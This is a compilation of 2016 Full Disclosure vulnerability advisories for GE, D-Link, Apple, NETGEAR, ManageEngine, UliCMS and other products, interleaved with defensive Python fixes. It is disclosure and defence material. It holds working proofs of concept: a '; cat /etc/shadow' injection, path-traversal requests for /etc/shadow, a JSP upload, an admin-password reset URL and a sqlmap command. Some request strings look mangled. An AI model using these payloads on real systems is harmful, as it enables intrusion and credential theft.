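# result types. "Horse" is the value shown on the page; the others are constructed.
VALID_RESULT_TYPES = {"Horse", "Jockey", "Trainer"}

# Constructed inputs in the spirit of the two PoCs (shortened; no real domains).
SPOOF_TYPE = "<h1><b>An error occured. Please log in at www.example.invalid</b></h1>"
INJECTED_TITLE = 'Photo pack"><s>injected</s>'


def render_results_vulnerable(type_param: str) -> str:
    """Parameter echoed into the page unmodified, as the report describes."""
    return f"<h1>{type_param} results</h1>"


def render_results(type_param: str) -> str:
    """An enumerated parameter is matched against its allowlist, not merely
    encoded; the encoding is kept as defence in depth."""
    if type_param not in VALID_RESULT_TYPES:
        return "<h1>Results</h1><p>Unknown result type.</p>"
    return f"<h1>{html.escape(type_param)} results</h1>"


# Stored case (Getdpd advisory): a product title entered by a low-privilege
# account is later written into the product chooser's link markup.
def product_link_vulnerable(cart_path: str, option: int, title: str) -> str:
    return (f'<a href="/v2/cart/add/{cart_path}" rel="asm0option{option}" '
            f'title="{title}">{title}</a>')


def product_link(cart_path: str, option: int, title: str) -> str:
    """Quote-aware escaping for both the attribute and the text context, and
    shape checks on the values that are supposed to be numeric."""
    if not re.fullmatch(r"\d+(?:/\d+)*", cart_path):
        raise ValueError("cart path must be numeric path segments")
    safe_title = html.escape(title, quote=True)
    return (f'<a href="/v2/cart/add/{cart_path}" rel="asm0option{int(option)}" '
            f'title="{safe_title}">{safe_title}</a>')


if __name__ == "__main__":
    print(render_results_vulnerable(SPOOF_TYPE))
    print(render_results(SPOOF_TYPE))
    print(product_link_vulnerable("23787/114595/121094", 0, INJECTED_TITLE))
    print(product_link("23787/114595/121094", 0, INJECTED_TITLE))
```

`html.escape(..., quote=True)` is what makes the attribute context safe: without quote handling a `"` in the title would end the `title` attribute and the rest of the input would be parsed as new attributes, which is exactly the stored-XSS shape the Getdpd advisory reports.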


[FD] GE Industrial Solutions - UPS SNMP Adapter Command Injection and Clear-text Sensitive Info Vulnerabilities

2016-02-03 Thread Karn Ganeshen
GE Industrial Solutions - UPS SNMP Adapter Command Injection and Clear-text
Storage of Sensitive Information Vulnerabilities

*Timelines:*
Reported to ICS-CERT on: July 06, 2015
Fix & Advisory Released by GE: January 25, 2015
Vulnerability ID: GEIS16-01

*GE Advisory: *
http://apps.geindustrial.com/publibrary/checkout/GEIS_SNMP?TNR=Application%20and%20Technical|GEIS_SNMP|PDF=GEIS_SNMP.pdf



*ICS-CERT Advisory:* In Progress

*About GE*

GE is a US-based company that maintains offices in several countries around
the world.

The affected product, SNMP/Web Interface adapter, is a web server designed
to present information about the Uninterruptible Power Supply (UPS).
According to GE, the SNMP/Web Interface is deployed across several sectors
including Critical Manufacturing and Energy. GE estimates that these
products are used worldwide.

*Affected Products*

• All SNMP/Web Interface cards with firmware version prior to 4.8
manufactured by GE Industrial Solutions.

*CVE-IDs:*
CVE-2016-0861
CVE-2016-0862


*VULNERABILITY OVERVIEW*

*A. COMMAND INJECTION - CVE-2016-0861*
Device application services run as the (root) privileged user and do not
perform strict input validation. This allows an authenticated user to
execute any system commands on the system.

Vulnerable function:
http://IP/dig.asp 

Vulnerable parameter:
Hostname/IP address


*PoC:*
In the Hostname/IP address input, enter:
; cat /etc/shadow

Output
root::0:0:root:/root:/bin/sh
<...other system users...>
ge::101:0:gedeups7:/home/admin:/bin/sh
root123::102:0:gedeups2:/home/admin:/bin/sh

*B. CLEARTEXT STORAGE OF SENSITIVE INFORMATION - CVE-2016-0862*
The file contains sensitive account information stored in cleartext. All users,
including non-admins, can view/access the device's configuration via Menu
option -> Save -> Settings.

The application stores all information in clear-text, including *all user
logins and clear-text passwords*.


+
I sent it out on Jan 29 but for some reason, it was not posted to FD. So
sending it again.
-- 
Best Regards,
Karn Ganeshen
ipositivesecurity.blogspot.in

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
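The dig.asp finding above is the classic shape of OS command injection: a hostname field handed to a shell. As an added example (my code, not GE's or the advisory's), the following validates the hostname/IP value against a strict grammar and runs the lookup without a shell, so a value such as `; cat /etc/shadow` is rejected before it can reach any command line. The `dig +short` invocation is an assumption about how such a diagnostic page would call the resolver.

```python
import ipaddress
import re
import subprocess
from typing import List, Optional

# RFC 1123 hostname: labels of letters, digits and hyphens that neither start
# nor end with a hyphen, joined by dots, at most 253 characters overall.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*\.?$")


def is_valid_target(value: str) -> bool:
    """Accept only a literal IPv4/IPv6 address or an RFC 1123 hostname.

    Everything else (shell metacharacters, whitespace, quotes, leading '-'
    or '+' that dig would read as an option) fails the grammar."""
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.fullmatch(value) is not None


def build_dig_argv(value: str) -> Optional[List[str]]:
    """Return the argv for the lookup, or None when the input is rejected.

    The command is an argument list, never a shell string, so even if the
    validator were bypassed there is no shell to interpret ';' or '|'."""
    if not is_valid_target(value):
        return None
    return ["dig", "+short", value]  # assumed resolver call for this example


def run_lookup(value: str) -> str:
    """Validate, then execute the lookup with shell=False and a timeout."""
    argv = build_dig_argv(value)
    if argv is None:
        raise ValueError("rejected hostname/IP input")
    result = subprocess.run(argv, capture_output=True, text=True,
                            timeout=10, check=False)
    return result.stdout


if __name__ == "__main__":
    for candidate in ("example.com", "192.0.2.1", "; cat /etc/shadow", "-f"):
        print(f"{candidate!r}: {'accepted' if is_valid_target(candidate) else 'rejected'}")
```

The two layers are deliberate: the allowlist validator is what the page should have had, and `shell=False` is the control that still holds if someone later loosens the validator.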

[FD] DLink DVG-N5402SP Multiple Vulnerabilities

2016-02-03 Thread Karn Ganeshen
DLink DVG-N5402SP File Path Traversal, Weak Credentials Management, and
Sensitive Info Leakage Vulnerabilities

*Timelines*
Reported to CERT + Vendor: August 2015
Dlink released beta release: Oct 23, 2015
New fix release: MD5 (GRNV6.1U23J-83-DL-R1B114-SG_Normal.EN.img) =
04fd8b901e9f297a4cdbea803a9a43cb
No public disclosure till date - Dlink waiting for Service providers to ask
for new release + CERT opted out


*Vulnerable Models, Firmware, Hardware versions*
DVG-N5402SP Web Management
Model Name : GPN2.4P21-C-CN
Firmware Version : W1000CN-00
Firmware Version : W1000CN-03
Firmware Version : W2000EN-00
Hardware Platform : ZS
Hardware Version : Gpn2.4P21-C_WIFI-V0.05

Device can be managed through three users:
1. super - full privileges
2. admin - full privileges
3. support - restricted user

*1. Path traversal*
Arbitrary files can be read off of the device file system. No
authentication is required to exploit this vulnerability.
*CVE-ID*: CVE-2015-7245

*HTTP Request*

POST /cgi-bin/webproc HTTP/1.1
Host: :8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://:8080/cgi-bin/webproc
Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 223

getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/shadow%3Amenu=setup%3Apage=connected%
-action=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh


*HTTP Response*

HTTP/1.0 200 OK
pstVal->name:getpage; pstVal->value:html/main.html
pstVal->name:getpage; pstVal->value:html/index.html
pstVal->name:errorpage;
pstVal->value:../../../../../../../../../../../etc/shadow
pstVal->name:var:menu; pstVal->value:setup
pstVal->name:var:page; pstVal->value:connected
pstVal->name:var:subpage; pstVal->value:-
pstVal->name:obj-action; pstVal->value:auth
pstVal->name::username; pstVal->value:super
pstVal->name::password; pstVal->value:super
pstVal->name::action; pstVal->value:login
pstVal->name::sessionid; pstVal->value:1ac5da6b
Connection: close
Content-type: text/html
Pragma: no-cache
Cache-Control: no-cache
set-cookie: sessionid=1ac5da6b; expires=Fri, 31-Dec- 23:59:59 GMT;
path=/

#root::13796:0:9:7:::
root::13796:0:9:7:::
#tw::13796:0:9:7:::
#tw::13796:0:9:7:::


*2. Use of Default, Hard-Coded Credentials*
*CVE-ID*: CVE-2015-7246

The device has two system user accounts configured with default passwords
(root:root, tw:tw).
Login - tw - is not active though. Anyone could use the default password to
gain administrative control through the Telnet service of the system (when
enabled), leading to loss of integrity, loss of confidentiality, or loss of
availability.

*3. Sensitive info leakage via device running configuration backup*
*CVE-ID*: CVE-2015-7247

Usernames, passwords, keys, values and web account hashes (super & admin)
are stored in clear-text and not masked. It is noted that the restricted
'support' user may also access this config backup file from the portal
directly, gather clear-text admin creds, and gain full, unauthorized access
to the device.
-- 
Best Regards,
Karn Ganeshen
ipositivesecurity.blogspot.in


[FD] Apple Software Update 2.1.3 (Windows) Remote Command Execution.

2016-02-03 Thread Rio Sherri
Apple Software Update is a utility to update Apple software on Windows
machines. The update process uses this kind of architecture.
First the software makes a request to
http://swcatalog.apple.com/content/catalogs/others/index-windows-1.sucatalog
This returns an XML file containing URLs of ".dist" files, and there were
some more interesting things:

<key>Packages</key>
...
<key>URL</key>
<string>http://swcdn.apple.com/content/downloads/61/34/061-8153/WgWXrHyJVmFn9KrXRg3w2XPXNFXxhnZFS6/BootCampUpdate32.msp</string>
...

MSP is the file extension of the Windows Installer patch file format used by
Windows and Microsoft programs, typically for bug fixes, security updates
and hotfixes. Since the program connects to the host in plain-text HTTP, we
can use a MITM attack and modify the response and the link to a malicious
.msp, and we get remote command execution.

There are even .exe files:

...
<key>URL</key>
<string>http://swcdn.apple.com/content/downloads/21/23/061-4512/BKYTZyKmtNr5wpxQCTy9f8xDSYPZ5MTGf4/BCLocUpdateEnable.exe</string>
...

Apart from this, if we take a look at the .dist file, the program uses XML
files. It has options for URLs, arch, etc.
An example:
http://swcdn.apple.com/content/downloads/42/17/031-43074/ts4e9jo3pe732xq8ghsq504uye3x1dt7az/031-43074.English.dist
has the following content:

...
BootCampUpdate32.msp
...

It has an "rtf" file content which is run when the installation
begins (which can lead to exploitation of Word bugs).
It has an HTML file content which is run through the IE scripting
engine (which can lead to exploitation of Internet Explorer bugs).

The other interesting thing is:

AppleApplicationSupport.msi
QuickTime.msi
QuickTime.msi
QuickTimeInstallerAdmin.exe

Basically these are the commands that get executed throughout installation.
So, modifying this response through a MITM, adding an argument as below:
From:
QuickTime.msi
To:
QuickTime.msi

Our command executes.

Rio Sherri
Infogen AL

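The root cause in the post is not the .msp or .exe packages themselves but that the catalog pointing at them is fetched over plain HTTP, which is what a network attacker needs in order to substitute the links. As an added example (my code, not Apple's and not from the post), this parses a software update catalog as an Apple property list and reports every installer or distribution URL that is not served over HTTPS. The catalog below is constructed for the example: its nesting follows the `Packages` / `URL` keys quoted in the post, and the other key names are assumptions.

```python
import plistlib
from typing import Any, Dict, List
from urllib.parse import urlsplit

# Constructed catalog fragment for this example. Only "Packages" and "URL"
# come from the post; "Products", "Distributions" and the paths are assumed.
SAMPLE_CATALOG = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Products</key>
  <dict>
    <key>061-8153</key>
    <dict>
      <key>Packages</key>
      <array>
        <dict>
          <key>URL</key>
          <string>http://swcdn.example.invalid/content/downloads/example/BootCampUpdate32.msp</string>
        </dict>
        <dict>
          <key>URL</key>
          <string>https://swcdn.example.invalid/content/downloads/example/SignedPackage.msi</string>
        </dict>
      </array>
      <key>Distributions</key>
      <dict>
        <key>English</key>
        <string>http://swcdn.example.invalid/content/downloads/example/031-43074.English.dist</string>
      </dict>
    </dict>
  </dict>
</dict>
</plist>
"""

# Anything of these types is executed or interpreted on the client, so a
# plain-http URL for it is a direct code-substitution opportunity.
EXECUTABLE_SUFFIXES = (".msp", ".msi", ".exe", ".dist")


def collect_urls(node: Any) -> List[str]:
    """Walk the parsed plist (dicts, lists, scalars) and return every
    string value that carries an http or https scheme, regardless of
    where in the structure it sits."""
    found: List[str] = []
    if isinstance(node, dict):
        for value in node.values():
            found.extend(collect_urls(value))
    elif isinstance(node, list):
        for value in node:
            found.extend(collect_urls(value))
    elif isinstance(node, str) and urlsplit(node).scheme in ("http", "https"):
        found.append(node)
    return found


def audit_catalog(catalog: bytes) -> Dict[str, List[str]]:
    """Classify catalog URLs by transport and by what the client does with them."""
    parsed = plistlib.loads(catalog)
    report: Dict[str, List[str]] = {"insecure_installers": [], "insecure_other": [], "https": []}
    for url in collect_urls(parsed):
        parts = urlsplit(url)
        if parts.scheme == "https":
            report["https"].append(url)
        elif parts.path.lower().endswith(EXECUTABLE_SUFFIXES):
            report["insecure_installers"].append(url)
        else:
            report["insecure_other"].append(url)
    return report


if __name__ == "__main__":
    for bucket, urls in audit_catalog(SAMPLE_CATALOG).items():
        print(bucket)
        for url in urls:
            print("  ", url)
```

The walker is structure-agnostic on purpose: a catalog format can change, but any `http://` string that names an installer is the thing worth flagging, and TLS on the catalog alone is not sufficient if the package links it contains are still plain HTTP.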


[FD] ArpON (ARP handler inspection) 3.0-ng release

2016-02-03 Thread Andrea Di Pasquale
Hello guys,

we have released the next generation 3.0 version.

ArpON is a host-based solution that makes the standardized ARP protocol
secure in order to avoid the Man In The Middle (MITM) attack through the
ARP spoofing, ARP cache poisoning or ARP poison routing attacks.

For further information please visit:

http://arpon.sourceforge.net


Thank you in advance.



[FD] [CERT 777024 / CVE-2016-1524/5]: RCE and file download in Netgear NMS300

2016-02-03 Thread Pedro Ribeiro
Hi,

CERT/CC has helped me disclose two vulnerabilities in NETGEAR's
Pro"safe" Network Management System 300 [1]. Two classical bugs: one
remote code execution via arbitrary file upload and an authenticated
arbitrary file download.

The full advisory can be seen in my repo at [2] and it is also pasted
below. I've also released two Metasploit modules to exploit these
vulnerabilities [3][4].

There is currently no fix for these - do not expose NMS300 to the
Internet! I've decided to release the exploits anyway as CERT's advisory
details how the vulnerability can be exploited.

Regards,
Pedro

[1] https://www.kb.cert.org/vuls/id/777024
[2]
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt
[3] https://github.com/rapid7/metasploit-framework/pull/6530
[4] https://github.com/rapid7/metasploit-framework/pull/6531


>> Remote code execution / arbitrary file download in NETGEAR ProSafe
Network Management System NMS300
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
Security (http://www.agileinfosec.co.uk/)
==
Disclosure: 04/02/2016 / Last updated: 04/02/2016


>> Background on the affected product:
"NMS300
ProSAFE® Network Management System
Diagnose, control, and optimize your network devices.

The NETGEAR Management System NMS300 delivers insight into network
elements, including third-party devices. An intuitive, web-based user
interface makes it easier to monitor and administer an entire network."


>> Summary:
Netgear's NMS300 is a network management utility that runs on Windows
systems. It has two serious vulnerabilities that can be exploited by a
remote attacker. The first one is an arbitrary file upload vulnerability
that allows an unauthenticated attacker to execute Java code as the
SYSTEM user.
The second vulnerability is an arbitrary file download that allows an
authenticated user to download any file from the host that is running
NMS300.

A special thanks to Joel Land of CERT/CC for helping disclose this
vulnerability under ID 777024 [1]. Two new Metasploit modules that
exploit these vulnerabilities have been released.


>> Technical details:
#1
Vulnerability: Remote code execution via arbitrary file upload
(unauthenticated)
CVE-2016-1525
Affected versions:
NMS300 1.5.0.11
NMS300 1.5.0.2
NMS300 1.4.0.17
NMS300 1.1.0.13

There are two servlets that allow unauthenticated file uploads:
@RequestMapping({ "/fileUpload.do" })
public class FileUpload2Controller
- Uses spring file upload

@RequestMapping({ "/lib-1.0/external/flash/fileUpload.do" })
public class FileUploadController
- Uses flash upload

The JSP file can be uploaded as shown below, it will be named
null[name].[extension] and can be reached on
http://[host]:8080/null[name].[extension].
So for example if [name] = "testing" and [extension] = ".jsp", the final
file will be named "nulltesting.jsp". [name] and [extension] can be seen
in the sample request below. The code will execute as the SYSTEM user.

POST /lib-1.0/external/flash/fileUpload.do HTTP/1.1
Content-Type: multipart/form-data;
boundary=--ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3

ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
Content-Disposition: form-data; name="name"

[name]
ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
Content-Disposition: form-data; name="Filedata";
filename="whatever.[extension]"
Content-Type: application/octet-stream

<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
pageEncoding="ISO-8859-1"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Hello World Example</title>
</head>
<body>
A Hello World Example of JSP.
</body>
</html>
ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3--


#2
Vulnerability: Arbitrary file download (authenticated)
CVE-2016-1524
Affected versions:
NMS300 1.5.0.11
NMS300 1.5.0.2
NMS300 1.4.0.17
NMS300 1.1.0.13

Three steps need to be taken in order to exploit this vulnerability:
a) Add a configuration image, with the realName parameter containing the
path traversal to the target file:
POST /data/config/image.do?method=add HTTP/1.1
realName=../../../../../../../../../../===1337=Netgear=4=FS526Tv2=bla

b) Obtain the file identifier (imageId) for the image that was created
by scraping the page below for "imagename.img" (the fileName parameter
in step 1):
POST /data/getPage.do?method=getPageList=configImgManager
everyPage=1

Sample response:
{"page":{"beginIndex":0,"recordCount":7,"totalRecords":7,"currentPage":1,"everyPage":10,"totalPage":1},"list":[{"imageId":"1","fileName":"agga5.img","createTime":"10/03/2015
21:12:36","realFileName":"../../../../../../../../../../log.txt","vendor":"Netgear","deviceType":"4","deviceModel":"FS526Tv2","version":"2323","sizeM":"24491","createBy":"admin","createId":"1","description":"bla\r\n"}

c) Download the file with the imageId obtained in step 2:
GET /data/config/image.do?method=export=


>> Fix:
No fix is currently available. It is recommended not to expose NMS300 to
the Internet or any untrusted networks.


>> 
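Both the D-Link `errorpage` traversal earlier in this digest and the NMS300 `realName` export above come down to one missing check: the server never confirms that the path it is about to open still lies inside the directory it meant to serve. The unauthenticated upload is the same class of omission on the way in. As an added example (my code, not NETGEAR's or D-Link's), the containment check below covers both traversal cases and the upload helper shows the constraints the NMS300 servlets lacked. `WEB_ROOT`, `UPLOAD_DIR` and the extension allowlist are assumptions for the example.

```python
import os
import posixpath
import secrets
from typing import Optional

WEB_ROOT = "/var/www/html"                      # assumed document root of the web UI
UPLOAD_DIR = "/var/lib/app/uploads"             # assumed storage dir, outside the served tree
ALLOWED_EXTENSIONS = {".img", ".cfg", ".txt"}   # assumed allowlist of config image types


def resolve_under(root: str, user_path: str) -> Optional[str]:
    """Return the resolved path of user_path inside root, or None if it escapes.

    The comparison is made on the normalised result, so '..' segments,
    absolute paths and symlinks are all handled by one check. A plain
    string-prefix test is not enough: '/var/www/html2' starts with
    '/var/www/html' but is not inside it, which commonpath() gets right."""
    if not user_path or "\x00" in user_path or os.path.isabs(user_path):
        return None
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, user_path))
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    return candidate


def safe_upload_name(name: Optional[str], client_filename: str) -> Optional[str]:
    """Derive a storage filename the client cannot steer.

    * a missing 'name' is rejected instead of being stringified (the NMS300
      files were literally prefixed 'null' for that reason),
    * only the extension is kept, and only if it is on the allowlist, so
      '.jsp' never reaches disk under a servlet container,
    * the base name is replaced by a random token, so the client cannot
      predict the URL or overwrite an existing file."""
    if name is None or not name.strip():
        return None
    ext = posixpath.splitext(posixpath.basename(client_filename))[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return None
    return secrets.token_hex(8) + ext


def export_path_for(stored_real_name: str) -> Optional[str]:
    """Resolve the realName recorded for a config image at export time.

    Even a value that was stored earlier by a trusted-looking step is
    re-checked here; the NMS300 bug was that the export trusted it."""
    return resolve_under(UPLOAD_DIR, stored_real_name)


if __name__ == "__main__":
    for p in ("html/index.html", "../../../../../../../../../../../etc/shadow", "/etc/shadow"):
        print(f"{p!r} -> {resolve_under(WEB_ROOT, p)}")
    print(safe_upload_name("testing", "whatever.jsp"), safe_upload_name("testing", "backup.img"))
```

Storing uploads outside the served tree and handing out only a random name means that even a mistake in the allowlist does not turn into a URL the uploader can request, which is the property the `null[name].[extension]` path above gave away.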

[FD] AST-2016-002: File descriptor exhaustion in chan_sip

2016-02-03 Thread Asterisk Security Team
Asterisk Project Security Advisory - AST-2016-002

Product:            Asterisk
Summary:            File descriptor exhaustion in chan_sip
Nature of Advisory: Denial of Service
Susceptibility:     Remote Unauthenticated Sessions
Severity:           Minor
Exploits Known:     Yes
Reported On:        September 17, 2015
Reported By:        Alexander Traud
Posted On:          February 3, 2016
Last Updated On:    February 3, 2016
Advisory Contact:   Richard Mudgett
CVE Name:           Pending

Description: Setting the sip.conf timert1 value to a value higher than
1245 can cause an integer overflow and result in large retransmit timeout
times. These large timeout values hold system file descriptors hostage and
can cause the system to run out of file descriptors.

Resolution: Setting the sip.conf timert1 value to 1245 or lower will not
exhibit the vulnerability. The default timert1 value is 500. Asterisk has
been patched to detect the integer overflow and calculate the previous
retransmission timer value.

Affected Versions
Product                 Release Series
Asterisk Open Source    1.8.x           All versions
Asterisk Open Source    11.x            All versions
Asterisk Open Source    12.x            All versions
Asterisk Open Source    13.x            All versions
Certified Asterisk      1.8.28          All versions
Certified Asterisk      11.6            All versions
Certified Asterisk      13.1            All versions

Corrected In
Product                 Release
Asterisk Open Source    11.21.1, 13.7.1
Certified Asterisk      11.6-cert12, 13.1-cert3

Patches
SVN URL                                                              Revision
http://downloads.asterisk.org/pub/security/AST-2016-002-1.8.28.diff  Certified Asterisk 1.8.28
http://downloads.asterisk.org/pub/security/AST-2016-002-11.6.diff    Certified Asterisk 11.6
http://downloads.asterisk.org/pub/security/AST-2016-002-13.1.diff    Certified Asterisk 13.1
http://downloads.asterisk.org/pub/security/AST-2016-002-1.8.diff     Asterisk 1.8
http://downloads.asterisk.org/pub/security/AST-2016-002-11.diff      Asterisk 11
http://downloads.asterisk.org/pub/security/AST-2016-002-12.diff      Asterisk 12
http://downloads.asterisk.org/pub/security/AST-2016-002-13.diff      Asterisk 13

Links  https://issues.asterisk.org/jira/browse/ASTERISK-25397 

Asterisk Project Security Advisories are posted at
http://www.asterisk.org/security  
  
This document may be superseded by later versions; if so, the latest  
version will be posted at 
http://downloads.digium.com/pub/security/AST-2016-002.pdf and 
http://downloads.digium.com/pub/security/AST-2016-002.html

Revision History
   Date 

[FD] ManageEngine Eventlog Analyzer v4-v10 Privilege Escalation

2016-02-03 Thread graphx
# Exploit Title: ManageEngine Eventlog Analyzer Privilege Escalation
# Exploit Author: @GraphX
# Vendor Homepage:http://www.manageengine.com
# Version: 4.0 - 10


1. Description:
The ManageEngine EventLog Analyzer fails to properly verify user
privileges when making changes via userManagementForm.do. An
unprivileged user would be allowed to make changes to any account by
changing the USER_ID field to a number corresponding to another user.
Testing discovered that the default admin and guest accounts are 1 and 2.

Considering the recent similar vulnerabilities discovered in a more
current version of a similar product by ManageEngine, it is possible that
more versions of the software, including the current one, are vulnerable.
According to the vendor this is fixed in version 10.8.


2. Proof of Concept:

- Log in as an unprivileged user
- Use the following URL to change the admin password to "admin"

http:///event/userManagementForm.do?addField=false=request.getParameter(=admin=_ID=1=Save+User+Details=admin


3. Solution:
Upgrade to 10.8



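The userManagementForm.do issue is an authorization check that trusts a client-supplied identifier (USER_ID) over the session. As an added example (my code, not ManageEngine's), the handler below shows the fix at the decision point: a non-admin session always acts on its own record no matter what the form claims, and privileged fields are refused outright. The field names and the `Session` shape are assumptions for the example.

```python
from dataclasses import dataclass
from typing import Dict

# Field names are assumptions for this example, not the product's own.
EDITABLE_FIELDS = {"email", "password", "role"}
PRIVILEGED_FIELDS = {"role"}


class AuthorizationError(Exception):
    """Raised when a request tries to act outside its session's rights."""


@dataclass(frozen=True)
class Session:
    user_id: int
    role: str  # "admin" or "user"


def target_user_for_update(session: Session, form: Dict[str, str]) -> int:
    """Decide whose record an update applies to.

    The vulnerable pattern is int(form["USER_ID"]) used as-is. Here a
    non-admin session is bound to its own id regardless of the form, and
    only an admin may name another user explicitly."""
    if session.role != "admin":
        return session.user_id
    return int(form.get("USER_ID", session.user_id))


def apply_user_update(session: Session, form: Dict[str, str],
                      users: Dict[int, Dict[str, str]]) -> int:
    """Apply an allowlisted set of changes and return the id that was changed."""
    target = target_user_for_update(session, form)
    if target not in users:
        raise KeyError(f"unknown user {target}")
    changes = {k: v for k, v in form.items() if k in EDITABLE_FIELDS}
    if session.role != "admin" and changes.keys() & PRIVILEGED_FIELDS:
        raise AuthorizationError("non-admin attempted to change a privileged field")
    # A real implementation hashes the password before storing it.
    users[target].update(changes)
    return target


if __name__ == "__main__":
    db = {1: {"password": "old-admin", "role": "admin"}, 2: {"password": "old-guest", "role": "user"}}
    guest = Session(user_id=2, role="user")
    changed = apply_user_update(guest, {"USER_ID": "1", "password": "admin"}, db)
    print("guest request changed user", changed, "->", db)
```

The point is where the identity comes from: the target of a change is derived from the authenticated session, and the request parameter is only consulted once the session has been shown to hold a role that may use it.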


[FD] Atutor 2.2: XSS

2016-02-03 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Atutor 2.2
Fixed in:            partly in ATutor 2.2.1-RC1, complete in 2.2.1
Fixed Version Link:  http://www.atutor.ca/atutor/download.php
Vendor Website:      http://www.atutor.ca/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  11/17/2015
Disclosed to public: 02/01/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

Atutor is a learning management system (LMS) written in PHP. In version 2.2, it
is vulnerable to multiple reflected and persistent XSS attacks.

The vulnerabilities can lead to the stealing of cookies, injection of
keyloggers, or the bypassing of CSRF protection. If the victim is an admin, a
successful exploitation can lead to code execution via the theme uploader, and
if the victim is an instructor, this can lead to code execution via a file
upload vulnerability in the same version of Atutor.

3. Details

XSS 1: Reflected XSS - Calendar

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description: The calendar_next parameter of the calendar is vulnerable to XSS.
This issue has been fixed in ATutor 2.2.1-RC1.

Proof of Concept:



[FD] Time-based SQL Injection in Admin panel UliCMS <= v9.8.1

2016-02-03 Thread Manuel Garcia Cardenas
=
MGC ALERT 2016-001
- Original release date: January 26, 2016
- Last revised:  February 02, 2016
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=

I. VULNERABILITY
-
Time-based SQL Injection in Admin panel UliCMS <= v9.8.1

II. BACKGROUND
-
UliCMS is a modern web content management solution from Germany that
attempts to make web content management easier.

III. DESCRIPTION
-
This bug was found using the portal with authentication as administrator.
To exploit the vulnerability it is only necessary to use version 1.0 of the
HTTP protocol to interact with the application.

It is possible to inject SQL code in the variable "country_blacklist" on
the page "action=spam_filter".

IV. PROOF OF CONCEPT
-
The following URLs and parameters have been confirmed to suffer from
time-based blind SQL injection.

/ulicms/admin/?action=spam_filter

(POST)
spamfilter_enabled=yes_words_blacklist=a_blacklist=ru_spamfilter_settings=Save+Changes

PoC using sqlmap:

sqlmap -u "http://127.0.0.1/ulicms/admin/?action=spam_filter" \
  --cookie="SET COOKIE HERE" \
  --data="spamfilter_enabled=yes_words_blacklist=a_blacklist=ru_spamfilter_settings=Save+Changes" \
  -p "country_blacklist" --dbms="mysql" --dbs

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
UliCMS <= v9.8.1

VII. SOLUTION
-
Install vendor patch.

VIII. REFERENCES
-
http://en.ulicms.de/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
January 26, 2016 1: Initial release
February 02, 2015 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
January 26, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas
January 26, 2016 2: Send to vendor
January 28, 2016 3: Vendor fixes vulnerability
February 02, 2016 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester

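A time-based blind injection is only a way of confirming that a form value is being spliced into SQL text; the fix is the same as for any injection, a parameterised statement. As an added example (my code, not UliCMS's), the two update routines below store the same `country_blacklist` value, one by string concatenation and one with a bound parameter, against a constructed in-memory SQLite settings table. SQLite has no SLEEP(), so instead of a timing side channel the constructed payload rewrites the WHERE clause, which makes the difference between the two versions something that can be asserted rather than timed.

```python
import sqlite3

ADMIN_HASH = "constructed-hash-value"  # constructed stand-in, not a real hash

# Constructed payload: closes the string, retargets the WHERE clause and
# comments out the rest of the statement.
PAYLOAD = "x' WHERE name = 'admin_password_hash' -- "


def make_settings_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for a CMS settings table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE settings (name TEXT PRIMARY KEY, value TEXT)")
    conn.executemany(
        "INSERT INTO settings VALUES (?, ?)",
        [("country_blacklist", "ru"), ("admin_password_hash", ADMIN_HASH)],
    )
    conn.commit()
    return conn


def vulnerable_update(conn: sqlite3.Connection, country_blacklist: str) -> None:
    """The defective pattern: the form value becomes part of the SQL text."""
    sql = ("UPDATE settings SET value = '" + country_blacklist
           + "' WHERE name = 'country_blacklist'")
    conn.execute(sql)
    conn.commit()


def safe_update(conn: sqlite3.Connection, country_blacklist: str) -> None:
    """The fix: the value travels as a bound parameter, never as SQL."""
    conn.execute(
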